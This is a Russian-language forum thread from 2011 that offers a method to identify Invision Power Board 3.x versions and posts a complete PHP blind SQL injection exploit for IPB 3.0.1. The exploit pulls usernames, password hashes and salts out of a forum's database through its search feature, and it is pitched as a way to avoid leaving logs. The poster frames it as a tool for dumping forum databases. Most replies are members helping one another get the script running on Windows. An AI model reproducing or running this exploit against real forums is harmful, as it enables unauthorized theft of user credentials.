Регистрация Главная Сообщество
Сообщения за день Справка Регистрация
Навигация
Zhyk.org LIVE! Реклама на Zhyk.org Правила Форума Награды и достижения Доска "почета"

определяем версию форума ipb 3+. эксплоит 3.0.1

-

Архив

- Архив Lineage 2 - собрание неактуальных на данный момент тем. Может быть полезен для изучения истории

 
 
Опции темы
Старый 03.03.2011, 19:44   #1
 Разведчик
Аватар для sekaskissa
 
sekaskissa на правильном путиsekaskissa на правильном пути
Регистрация: 13.02.2010
Сообщений: 32
Популярность: 105
Сказал(а) спасибо: 52
Поблагодарили 97 раз(а) в 38 сообщениях
Отправить сообщение для sekaskissa с помощью ICQ Отправить сообщение для sekaskissa с помощью Skype™
 
Arrow определяем версию форума ipb 3+. эксплоит 3.0.1

все мы знаем как определить версию ipb 2.3.5-2.3.6 (визуально)
но с 3+ все гораздо сложнее казалось бы ведь они все на одно лицо. так вот. все очень просто. идем по такому пути
ваш_сайт/форум/адмика/admin/install/index.php

пример [Ссылки могут видеть только зарегистрированные пользователи. ]

админка может называться не admin. в интернете есть куча софта по определению адреса админки.

к чему я это все написал. в некоторых версиях ипб есть уязвимости но без точной версии использовать их крайне сложно.

вот пример эксплоита под ipb 3.0.1

PHP код:
<?php
error_reporting
(E_ALL);
//////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// IPB 3.0.1 sql injection exploit
// Version 1.0
// written by Cryptovirus
// http://de.crypt.in/
// 31. january 2010
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_POST, so no suspicious logs
// 3. Pretesting saves time if IPB is not vulnerable
// 4. curl extension autoloading
// 5. log format compatible with passwordspro
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//================================================== ===================
$cli php_sapi_name() === 'cli';
//================================================== ===================
// Die, if executed from webserver
//================================================== ===================
if(!$cli)
{
echo 
"<html><head><title>Attention!</title></head>\n";
echo 
"<body><br /><br /><center>\n";
echo 
"<h1>Error!</h1>\n";
echo 
"This exploit is meant to be used as php CLI script!<br />\n";
echo 
"More information:<br />\n";
echo 
"<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
echo 
"This script will not run through a webserver.<br />\n";
echo 
"</center></body></html>\n";
exit;
}
//================================================== ===================
// Print the awesome de.crypt.in logo
//================================================== ===================
echo "\n _ _ _ ";
echo 
"\n __| | ___ ___ _ __ _ _ _ __ | |_ (_)_ __ ";
echo 
"\n / _` |/ _ \ / __| '__| | | | '_ \| __| | | '_ \ ";
echo 
"\n| (_| | __/| (__| | | |_| | |_) | |_ _| | | | |";
echo 
"\n \__,_|\___(_)___|_| \__, | .__/ \__(_)_|_| |_|";
echo 
"\n |___/|_| \n\n";
//================================================== ===================
// Check if all command line arguments were passed
//================================================== ===================
if(!isset($argv[1])||!isset($argv[2])||!isset($argv[3])){
echo 
"Usage: php ".$_SERVER['PHP_SELF']." <target> <userid> <option> [login] [password]\n";
echo 
"\n";
echo 
"NOTE: Login and password are optional, use for forums that require registration.\n";
echo 
"Options: 1 - Fetch username, 2 - Fetch password hash\n\n";
echo 
"Example: php ".$_SERVER['PHP_SELF']." http://ipb.com/board/ 1 1 foo bar\n";
die;
}
//================================================== ===================
// Set some important variables...
//================================================== ===================
$topicname '';
$url $argv[1];
$chosen_id $argv[2];
$ch_option $argv[3];
if(isset(
$argv[4])){
if(isset(
$argv[5])){
$user_login $argv[4];
$user_pass $argv[5];
}
else{
echo 
"Error: Password not specified with username\n";
die;
}
}
# Proxy settings
# Be sure to use proxy 
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile './ipb_log.txt'//Log file

if(!extension_loaded('curl'))
{
if(!
dl('php_curl.dll'))
{
die(
"Curl extension not loaded!\n Fatal exit ...\n");
}
else
{
echo 
"Curl loading success\n";
}
}
//================================================== ===================
xecho("Target: $url\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
add_line("==========================================");
add_line("Target: $url");
if(isset(
$argv[4])){
login_to_forum($argv[4], $argv[5]);
}
$i $chosen_id;
echo 
"Fetching topics from ID $i\n";
if(!
fetch_target_id($i))
{
echo 
"No topics found.\n";
fwrite(STDOUT"Last ditch effort, enter topic: ");
$topicname trim(fgets(STDIN)); 
}
else echo 
"Topic found! Hacktime.\n";

// Check chosen option and proceed accordingly
add_line("------------------------------------------");
if(
$ch_option == 2){
$hash get_hash($i);
$salt get_salt($i);
$line "$i:$hash:$salt";
add_line($line);
xecho("\n------------------------------------------\n");
xecho("User ID: $i\n");
xecho("Hash: $hash\n");
xecho("Salt: $salt");
xecho("\n------------------------------------------\n");
}
else if(
$ch_option == 1){
$uname get_user($i);
$line "The username for id $i is $uname";
add_line($line);
xecho("$uname");
}
xecho("\nQuestions and feedback - http://de.crypt.in/ \n");
die(
" \n");
//////////////////////////////////////////////////////////////////////
function login_to_forum($user$pass)
{
global 
$url;
$post 'app=core&module=global&section=login&do=process&username='.$user.'&password='.$pass.'&rememberMe=1';
$buff trim(make_post($url$post''$url));
if(
strpos($buff,'The login was successful!')>0){
xecho("Logged in.\n");
}
else{
xecho("Error: Unable to login.");
die;
}
}
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
global 
$url;

$post 'app=core&module=search&section=search&do=quick_search&search_app=core&fromsearch=1&search_filter_app%5Ball%5D=1&content_title_only=1&search_term=test%2527';
$buff trim(make_post($url$post''$url));

if(
strpos($buff,'Moved Permanently')>0)
{
die(
'Ivalid. Try adding trailing slash to url. Exiting ...');
}

if(
strpos($buff,'No results found for')>0)
{
die(
'Target is patched? Exiting ...');
}
}
//////////////////////////////////////////////////////////////////////
function fetch_target_id($id)
{
global 
$url$topicname
$post 'app=core&module=search&do=user_posts&mid='.$id.'&view_by_title=1&search_filter_app%5Bforums%5D=1';
$buff trim(make_post($url$post''$url));
if(
strpos($buff,'View result')>0){
$location strpos($buff,'View result');
$start strpos($buff,'>',$location)+1;
$end strpos($buff,'</a>',$start);
$topicname substr($buff,$start,($end-$start));
return 
true;
}
else return 
false;
}
///////////////////////////////////////////////////////////////////////
function get_salt($id)
{
$len 5;
$out '';
xecho("Finding salt ...\n");
for(
$i 1$i $len 1$i ++)
{
$ch get_saltchar($i$id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current salt: $out \n");
}
xecho("\nFinal salt for ID $id$out\n\n");
return 
$out;
}
///////////////////////////////////////////////////////////////////////
function get_saltchar($pos$id)
{
global 
$prefix;
$char '';
$min 32;
$max 128;
$pattern 'm.member_id='.$id.' AND ORD(SUBSTR(m.members_pass_salt,'.$pos.',1))';
$curr 0;
while(
1)
{
$area $max $min;
if(
$area )
{
$post $pattern "=$max";
$eq test_condition($post);
if(
$eq)
{
$char chr($max);
}
else
{
$char chr($min);
}
break;
}

$half intval(floor($area 2));
$curr $min $half;
$post $pattern '%253e' $curr;
$bigger test_condition($post);
if(
$bigger)
{
$min $curr;
}
else
{
$max $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return 
$char;
}
///////////////////////////////////////////////////////////////////////
function get_hash($id)
{
$len 32;
$out '';
xecho("Finding hash ...\n");
for(
$i 1$i $len 1$i ++)
{
$ch get_hashchar($i$id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current hash: $out \n");
}
xecho("\nFinal hash for ID $id$out\n\n");
return 
$out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($pos$id)
{
global 
$prefix;
$char '';
$pattern 'm.member_id='.$id.' AND ORD(SUBSTR(m.members_pass_hash,'.$pos.',1))';
// First let's determine, if it's number or letter
$post $pattern '%253e57';
$letter test_condition($post);
if(
$letter)
{
$min 97;
$max 102;
xecho("Char to find is [a-f]\n");
}
else
{
$min 48;
$max 57;
xecho("Char to find is [0-9]\n");
}
$curr 0;
while(
1)
{
$area $max $min;
if(
$area )
{
$post $pattern "=$max";
$eq test_condition($post);
if(
$eq)
{
$char chr($max);
}
else
{
$char chr($min);
}
break;
}

$half intval(floor($area 2));
$curr $min $half;
$post $pattern '%253e' $curr;
$bigger test_condition($post);
if(
$bigger)
{
$min $curr;
}
else
{
$max $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return 
$char;
}
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_user($id)
{
$len 32;
$out '';

xecho("Finding username ...\n");

for(
$i 1$i $len 1$i ++)
{
$ch get_userchar($i$id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current username: $out \n");
}

xecho("\nFinal username for ID $id$out\n\n");

return 
$out;
}
///////////////////////////////////////////////////////////////////////
function get_userchar($pos$id)
{
global 
$prefix;

$char '';
$pattern 'm.member_id='.$id.' AND ORD(SUBSTR(m.name,'.$pos.',1))';

// First let's determine, if it's number or letter
$post $pattern '%253e57';
$letter test_condition($post);

if(
$letter)
{
$min 65;
$max 122;
xecho("Char to find is [a-f]\n");
}
else
{
$min 48;
$max 57;
xecho("Char to find is [0-9]\n");
}

$curr 0;

while(
1)
{
$area $max $min;
if(
$area )
{
$post $pattern "=$max";
$eq test_condition($post);

if(
$eq)
{
$char chr($max);
}
else
{
$char chr($min);
}

break;
}

$half intval(floor($area 2));
$curr $min $half;

$post $pattern '%253e' $curr;

$bigger test_condition($post);

if(
$bigger)
{
$min $curr;
}
else
{
$max $curr;
}

xecho("Current test: $curr-$max-$min\n");
}

return 
$char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global 
$url;
global 
$topicname;

$bret false;
$maxtry 10;
$try 1;

$pattern 'app=core&module=search&section=search&do=quick_search&search_app=core&fromsearch=1&search_filter_app%%5Ball%%5D=1&content_title_only=1&search_term='.$topicname.'%%2527 IN BOOLEAN MODE) AND %s AND MATCH(t.title) AGAINST(%%2527'.$topicname;
$post sprintf($pattern$p);

while(
1)
{
$buff trim(make_post($url$post''$url));

if(
strpos($buff,'Your search for the term <em><strong>')>0)
{
$bret true;
break;
}
elseif(
strpos($buff,'No results found for')>0)
{
break;
}
elseif(
strpos($buff'Driver Error</title>') !== false)
{
die(
"Sql error! Wrong prefix?\nExiting ... ");
}
else
{
xecho("test_condition() - try $try - invalid return value ...\n");
xecho("Will wait 30 seconds for flood control. Expect 2-3 tries.\n");
xecho("This is going to take years...\n");
sleep(10);
$try ++;
if(
$try $maxtry)
{
die(
"Too many tries - exiting ...\n");
}
else
{
xecho("Trying again - try $try ...\n");
}
}
}

return 
$bret;
}
///////////////////////////////////////////////////////////////////////
function make_post($url$post_fields=''$cookie ''$referer ''$headers FALSE)
{
$ch curl_init();
$timeout 120;
curl_setopt ($chCURLOPT_URL$url);
curl_setopt ($chCURLOPT_RETURNTRANSFER1);
curl_setopt ($chCURLOPT_CONNECTTIMEOUT$timeout);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS$post_fields);
curl_setopt($chCURLOPT_FOLLOWLOCATION0);
curl_setopt ($chCURLOPT_USERAGENT'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1');
curl_setopt ($chCURLOPT_COOKIEJAR'cookies.txt');
curl_setopt ($chCURLOPT_COOKIEFILE'cookies.txt');


if(!empty(
$GLOBALS['proxy_ip_port']))
{
curl_setopt($chCURLOPT_PROXY$GLOBALS['proxy_ip_port']);

if(!empty(
$GLOBALS['proxy_user_password']))
{
curl_setopt($chCURLOPT_PROXYUSERPWD$GLOBALS['proxy_user_password']);
}
}

if(!empty(
$cookie))
{
curl_setopt ($chCURLOPT_COOKIE$cookie);
}

if(!empty(
$referer))
{
curl_setopt ($chCURLOPT_REFERER$referer);
}

if(
$headers === TRUE)
{
curl_setopt ($chCURLOPT_HEADERTRUE);
}
else
{
curl_setopt ($chCURLOPT_HEADERFALSE);
}

$fc curl_exec($ch);
curl_close($ch);

return 
$fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($line)
{
global 
$outfile;
$line .= "\r\n";
$fh fopen($outfile'ab');
fwrite($fh$line);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
function xecho($line)
{
if(
$GLOBALS['cli'])
{
echo 
"$line";
}
else
{
$line nl2br(htmlspecialchars($line));
echo 
"$line";
}
}
///////////////////////////////////////////////////////////////////////
?>
Примечание если вы увидите надпись 3.0 то это версия 3.0.х (скорее всего 3.0.1) и 3.1 это 3.1.х (скорее всего 3.1.4)
данные приведены на основе форумов в л2топ

тема оригинальна. специально для zhyk.ru

з.ы. размещена в этом разделе так как имеет непосредственное отношение ко сливу баз. просьба если тема актуальна добавить ее в список полезных статей для слива баз. при копирайте указуйте автора плж
________________
дедики не продаю!!!
 
2 пользователя(ей) сказали cпасибо:
Spiritizm (03.03.2011), wantedboy (04.03.2011)
Старый 03.03.2011, 21:33   #2
Заблокирован
 Сержант
Аватар для zagar
 
zagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компании
Регистрация: 17.06.2010
Сообщений: 108
Популярность: 1007
Сказал(а) спасибо: 128
Поблагодарили 121 раз(а) в 54 сообщениях
Отправить сообщение для zagar с помощью ICQ Отправить сообщение для zagar с помощью Telegram Отправить сообщение для zagar с помощью MSN Отправить сообщение для zagar с помощью Yahoo Отправить сообщение для zagar с помощью Skype™
 
По умолчанию Re: определяем версию форума ipb 3+. эксплоит 3.0.1

как запускаеца скрипт? пробывал как и на 2.3.5 но не работает
 
Старый 03.03.2011, 21:42   #3
Читер-спонсор
 Рыцарь
Аватар для SetFer
 
SetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражания
Регистрация: 30.03.2010
Сообщений: 324
Популярность: 1681
Сказал(а) спасибо: 453
Поблагодарили 592 раз(а) в 295 сообщениях
 
По умолчанию Re: определяем версию форума ipb 3+. эксплоит 3.0.1

Дак какую уязвимость использует эксплоит?
 
Старый 03.03.2011, 21:47   #4
 Разведчик
Аватар для wildking
 
wildking на правильном путиwildking на правильном пути
Регистрация: 24.09.2009
Сообщений: 29
Популярность: 136
Сказал(а) спасибо: 49
Поблагодарили 64 раз(а) в 28 сообщениях
Отправить сообщение для wildking с помощью Skype™
 
По умолчанию Re: определяем версию форума ipb 3+. эксплоит 3.0.1

Цитата:
Сообщение от zagarПосмотреть сообщение
как запускаеца скрипт? пробывал как и на 2.3.5 но не работает

Usage: php C:\scriptname.php <target> <userid> <option> [login] [password]

NOTE: Login and password are optional, use for forums that require registration.

Options: 1 - Fetch username, 2 - Fetch password hash

Example: php C:\scriptname.php [Ссылки могут видеть только зарегистрированные пользователи. ] 1 1 foo bar
 
Пользователь сказал cпасибо:
zagar (04.03.2011)
Старый 04.03.2011, 09:05   #5
Заблокирован
 Сержант
Аватар для zagar
 
zagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компании
Регистрация: 17.06.2010
Сообщений: 108
Популярность: 1007
Сказал(а) спасибо: 128
Поблагодарили 121 раз(а) в 54 сообщениях
Отправить сообщение для zagar с помощью ICQ Отправить сообщение для zagar с помощью Telegram Отправить сообщение для zagar с помощью MSN Отправить сообщение для zagar с помощью Yahoo Отправить сообщение для zagar с помощью Skype™
 
По умолчанию Re: определяем версию форума ipb 3+. эксплоит 3.0.1

каму не сложно можно видео мануал? а то чет не выходит
 
Старый 04.03.2011, 09:50   #6
 Разведчик
Аватар для wildking
 
wildking на правильном путиwildking на правильном пути
Регистрация: 24.09.2009
Сообщений: 29
Популярность: 136
Сказал(а) спасибо: 49
Поблагодарили 64 раз(а) в 28 сообщениях
Отправить сообщение для wildking с помощью Skype™
 
По умолчанию Re: определяем версию форума ipb 3+. эксплоит 3.0.1

Скачали [Ссылки могут видеть только зарегистрированные пользователи. ]
Поставили и получилось допустим так C:\PHP\php.exe
Берем скрипт и сохраняем его в формате .php, допустим script.php
Запускаем cmd: C:\PHP\php.exe C:\PHP\script.php [Ссылки могут видеть только зарегистрированные пользователи. ] 1 1 log pas
 
Пользователь сказал cпасибо:
zagar (04.03.2011)
Старый 04.03.2011, 10:18   #7
Заблокирован
 Сержант
Аватар для zagar
 
zagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компании
Регистрация: 17.06.2010
Сообщений: 108
Популярность: 1007
Сказал(а) спасибо: 128
Поблагодарили 121 раз(а) в 54 сообщениях
Отправить сообщение для zagar с помощью ICQ Отправить сообщение для zagar с помощью Telegram Отправить сообщение для zagar с помощью MSN Отправить сообщение для zagar с помощью Yahoo Отправить сообщение для zagar с помощью Skype™
 
По умолчанию Re: определяем версию форума ipb 3+. эксплоит 3.0.1

[Ссылки могут видеть только зарегистрированные пользователи. ] вот такая ошибка(
 
Старый 04.03.2011, 10:20   #8
 Разведчик
Аватар для sunches
 
sunches на правильном путиsunches на правильном пути
Регистрация: 12.12.2009
Сообщений: 24
Популярность: 149
Сказал(а) спасибо: 143
Поблагодарили 19 раз(а) в 9 сообщениях
 
По умолчанию Re: определяем версию форума ipb 3+. эксплоит 3.0.1

Добавлено через 2 минуты
Цитата:
Сообщение от wildkingПосмотреть сообщение
Скачали [Ссылки могут видеть только зарегистрированные пользователи. ]
Поставили и получилось допустим так C:\PHP\php.exe
Берем скрипт и сохраняем его в формате .php, допустим script.php
Запускаем cmd: C:\PHP\php.exe C:\PHP\script.php [Ссылки могут видеть только зарегистрированные пользователи. ] 1 1 log pas

C:\Users\ренат>C:\php\php.exe
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_gd2.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_mbstring.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_mysql.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_mysqli.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_pdo_mysql.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0

через денвер можно будет или не?
________________
skype sunches123666

Последний раз редактировалось sunches; 04.03.2011 в 10:22. Причина: Добавлено сообщение
 
Старый 04.03.2011, 10:39   #9
Заблокирован
 Сержант
Аватар для zagar
 
zagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компании
Регистрация: 17.06.2010
Сообщений: 108
Популярность: 1007
Сказал(а) спасибо: 128
Поблагодарили 121 раз(а) в 54 сообщениях
Отправить сообщение для zagar с помощью ICQ Отправить сообщение для zagar с помощью Telegram Отправить сообщение для zagar с помощью MSN Отправить сообщение для zagar с помощью Yahoo Отправить сообщение для zagar с помощью Skype™
 
По умолчанию Re: определяем версию форума ipb 3+. эксплоит 3.0.1

как я понел надо старую версию типо этой php-5.3.5-nts-Win32-VC9-x86
 
Старый 04.03.2011, 10:53   #10
 Разведчик
Аватар для wildking
 
wildking на правильном путиwildking на правильном пути
Регистрация: 24.09.2009
Сообщений: 29
Популярность: 136
Сказал(а) спасибо: 49
Поблагодарили 64 раз(а) в 28 сообщениях
Отправить сообщение для wildking с помощью Skype™
 
По умолчанию Re: определяем версию форума ipb 3+. эксплоит 3.0.1

Цитата:
Сообщение от zagarПосмотреть сообщение
вот такая ошибка(

Тут видимо фикс или версия не подходит, эксплоит не прокатит
Цитата:
Сообщение от sunchesПосмотреть сообщение
C:\Users\ренат>C:\php\php.exe
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_gd2.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_mbstring.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_mysql.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_mysqli.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_pdo_mysql.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0

Не видит библиотек, написано же
В php.ini надо смотреть, все ли с путями нормально (extension_dir)

P.S. редкость где встретишь уязвимый фурум, т.к. дырам по сто лет, а уж тем более с эксплоитом из паблика

Последний раз редактировалось wildking; 04.03.2011 в 10:56.
 
Старый 04.03.2011, 10:54   #11
 Разведчик
Аватар для sunches
 
sunches на правильном путиsunches на правильном пути
Регистрация: 12.12.2009
Сообщений: 24
Популярность: 149
Сказал(а) спасибо: 143
Поблагодарили 19 раз(а) в 9 сообщениях
 
По умолчанию Re: определяем версию форума ipb 3+. эксплоит 3.0.1

Цитата:
Сообщение от wildkingПосмотреть сообщение
Тут видимо фикс или версия не подходит, эксплоит не прокатит


Не видит библиотек, написано же
В php.ini надо смотреть, все ли с путями нормально (extension_dir)

ого extension_dir вообще нету такого
php.ini
log_errors=On
error_log="C:\windows\temp\php-errors.log"
extension_dir="C:\PHP\ext"
[PHP_BZ2]
extension=php_bz2.dll

у меня почему то не все устаналивается как я понял.

может все таки из-за ОС? win7 стоит. Хотя наврятли
________________
skype sunches123666

Последний раз редактировалось sunches; 04.03.2011 в 10:58.
 
Старый 04.03.2011, 11:00   #12
 Разведчик
Аватар для wildking
 
wildking на правильном путиwildking на правильном пути
Регистрация: 24.09.2009
Сообщений: 29
Популярность: 136
Сказал(а) спасибо: 49
Поблагодарили 64 раз(а) в 28 сообщениях
Отправить сообщение для wildking с помощью Skype™
 
По умолчанию Re: определяем версию форума ipb 3+. эксплоит 3.0.1

; Directory in which the loadable extensions (modules) reside.

extension_dir="C:\PHP\ext"

Про кавычки забыл )
И посмотри есть ли вообще в конфиге расширения. Видимо проще было инсталером ставить
Библиотеки то лежат хоть по месту назначения ?)
Если что попробуй [Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]

Последний раз редактировалось wildking; 04.03.2011 в 11:35.
 
Пользователь сказал cпасибо:
sunches (04.03.2011)
Старый 04.03.2011, 11:10   #13
 Разведчик
Аватар для sunches
 
sunches на правильном путиsunches на правильном пути
Регистрация: 12.12.2009
Сообщений: 24
Популярность: 149
Сказал(а) спасибо: 143
Поблагодарили 19 раз(а) в 9 сообщениях
 
По умолчанию Re: определяем версию форума ipb 3+. эксплоит 3.0.1

Цитата:
Сообщение от wildkingПосмотреть сообщение
; Directory in which the loadable extensions (modules) reside.

extension_dir="C:\PHP\ext"

Про кавычки забыл )
И посмотри есть ли вообще в конфиге расширения. Видимо проще было инсталером ставить
Библиотеки то лежат хоть по месту назначения ?)
Если что попробуй [Ссылки могут видеть только зарегистрированные пользователи. ]

чет намудрил я походу сылку на инстарллер дай.

Да один хер) ладно пофиг забью) не очень горит.
________________
skype sunches123666

Последний раз редактировалось sunches; 04.03.2011 в 11:49.
 
Старый 04.03.2011, 15:40   #14
 Сержант
Аватар для Spiritizm
 
Spiritizm скоро будет известенSpiritizm скоро будет известенSpiritizm скоро будет известенSpiritizm скоро будет известен
Регистрация: 14.10.2010
Сообщений: 117
Популярность: 362
Сказал(а) спасибо: 277
Поблагодарили 160 раз(а) в 65 сообщениях
Отправить сообщение для Spiritizm с помощью ICQ
 
По умолчанию Re: определяем версию форума ipb 3+. эксплоит 3.0.1

[Ссылки могут видеть только зарегистрированные пользователи. ] запуск сплоитов
 
Старый 04.03.2011, 20:37   #15
Заблокирован
 Сержант
Аватар для zagar
 
zagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компанииzagar душа компании
Регистрация: 17.06.2010
Сообщений: 108
Популярность: 1007
Сказал(а) спасибо: 128
Поблагодарили 121 раз(а) в 54 сообщениях
Отправить сообщение для zagar с помощью ICQ Отправить сообщение для zagar с помощью Telegram Отправить сообщение для zagar с помощью MSN Отправить сообщение для zagar с помощью Yahoo Отправить сообщение для zagar с помощью Skype™
 
По умолчанию Re: определяем версию форума ipb 3+. эксплоит 3.0.1

либа везде фикс либа фейк)
 
 


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
эксплоит стресс веб necros555 Подполье Lineage 2 (0 уровень) 16 30.03.2010 17:53
[Информация] Новый эксплойт PSP Go с 6.20 OFW AsPin PSP 2 18.03.2010 11:05
Определяем частоту процессора, марку и модель. Ivan_32 ASM/WinAPI 1 23.09.2009 09:47

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 09:14.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net